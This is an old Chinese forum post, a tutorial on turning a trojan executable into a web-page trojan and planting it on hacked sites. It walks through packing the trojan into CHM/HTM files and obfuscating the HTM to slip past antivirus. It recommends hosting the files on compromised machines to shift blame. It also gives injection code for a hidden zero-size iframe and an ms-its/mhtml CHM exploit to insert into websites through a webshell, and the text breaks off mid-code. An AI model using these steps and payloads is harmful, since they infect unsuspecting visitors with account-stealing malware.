马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要 登录 才可以下载或查看,没有账号?注册
x
这是以前写的文章了..也是个很老的方法了...
当然做网页木马的方法并不止这几个...网上也有相应的教程和工具....没什么新意...只是给新手看的...老手现在可以直接跳过看别的文章了
希望台下的兄弟看了后表砸我....
其实做网页木马的方法还是很多滴~~网上也有相关教程。
最简单的也就是用ChmBuilder这个软件来制作chm木马了,首先我们要配置好一个木马服务端,我再这里就拿QQ杀手7.1版说下把。关于他的使用和配置我就不多说了把,下载了这软件都自带有帮助文件的,看几遍就会明白的了。然后生成服务端,假设我生成的木马服务端为mm.exe,接着打开ChmBuilder选择我们的mm
.exe然后点生成,就会在相同目录下自动生成一个mm.chm和mm.htm (注意:这几个文件可不要轻易去点哦,万一出了什么后果,不要找偶~~~……^_^) 接着就把mm.chm和mm.htm传到自己的空间,如果没空间有肉鸡也是可以滴,建议最好用肉鸡,这样万一对方发现了也是你发现你肉鸡。但是有的空间还是比较严格的,在上传时会发现那个mm.htm并不存在,那就是被对方的杀毒软件查杀了把。 到了这里我们就需要另外一个软件了htmtool
网页加密程序,选择源文件为mm.htm目标文件m.htm然后点加密,程序就会在mm.htm目录下生成一个用Javascript加密后的m.htm,然后把m.htm传肉鸡或空间里去把。 我在本机测试。_blank>http://127.0.0.1/m.htm就是我们的网页木马地址了,只要把这个发给别人,对方浏览了就会中了我们的木马。 但是对方会相信你吗?现在的网民安全意识也稍微提高了点,对于你发来的站都不会轻易去点。 所以呢~~还是自己动手把。入侵~~~~挂马!嘿嘿~~对不起那些站长了。 相信大家也都知道这个名词把.....不知道的就....别找我哦。
一般在你入侵了一个站拿到了webshell的时候,有的人也就是改下主页来满足自己的虚荣心把。下面来说挂马把。最常见的 挂站代码如下 :
<html>
<iframe src="http://127.0.0.1/m.htm" width="0" height="0" frameborder="0"></iframe>
</html> 把以上代码插到对方网页代码中,那么下次别人浏览了那个站点就会自动转向_blank>http://127.0.0.1/m.htm。而_blank>http://127.0.0.1/m.htm也就是我门的网页木马了,那width="0" height="0"又是什么意思呢?懂点英文的朋友也应该知道了把,width就是宽而height自然就是高了。我们把它设置为0也就是不显示了,对方也就看不见我们的这个页面,木马也就会被下载到本地。 不过感觉这个方法已经过失了,现在的站长在发现自己的站被挂了木马后,如果主页代码过多,只要搜索iframe就能找到了我们的木马了,一个del,哈哈~~~~玩完了。
所以,下面再介绍几个把。
单独利用chm这个文件来达到盗号目的。假设我们的木马服务端还是为mm.exe然后在他相同目录下建一个mm.htm文件,代码如下
<object id="RUNIT" WIDTH=0 HEIGHT=0 TYPE="application/x-oleobject" CODEBASE="mm.exe"
</object>
当然你也可以把mm.exe和mm.htm换成是别的文件名。然后用QuickCHM这个软件来编译成为chm文件。(这些工具在google都能搜索到的)然后chm向导。选中*.*,项目文件夹就是刚才那两个mm.exe和mm.htm所在的目录了。
然后下一步,htm文件在上,exe文件在下,接着可以编译他了。
编辑成功后千万不要点“是”给运行了。那样自己就中了马了~~然后就会发现原来的2个文件已经多出了四个
newproject.chm,newproject.hhc ,newproject.hhk ,newproject.hhp 其实最后三个是没用的,删了他把只留一个newproject.chm ,然后把他改任意名上传空间。 但这个挂马就不能用上面的那段代码了。假设我做好的chm木马为_blank>http://127.0.0.1/mm.chm 那就用以下代码 <textarea id="code" style="display:none;">
<object data="ms-its:mhtml:file://c:\foo.mht!_blank>http://127.0.0.1/mm.chm::/test.htm" type="text/x-scriptlet"></object>
</textarea>
<script language="javascript">
document.write(code.value.replace(/\${path}/g,location.href.substring(0,location.href.indexOf('index.asp'))));
</script> 请把路径换成你的chm木马地址,index.aso要换成对应的主页文件名,假如你要挂马的主页名是default.asp
那相应的index.asp也就要换成default.asp了。 但是好景不长啊,再好的东西也有坏的时候,就在一次挂马中 在主页里添加了以上代码后,发现主页自动被删,FT~~~真是极度郁闷!后来经过我反思,又想到了一个方法,也提供给大家,就是找一个能上传的肉鸡,然后新建一个文件,假设为ceshi.htm 然后这个文件什么都不要加
在代码里写入
<textarea id="code" style="display:none;">
<object data="ms-its | 
狗仔卡
发表于 2006-5-5 20:51:00
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡
楼主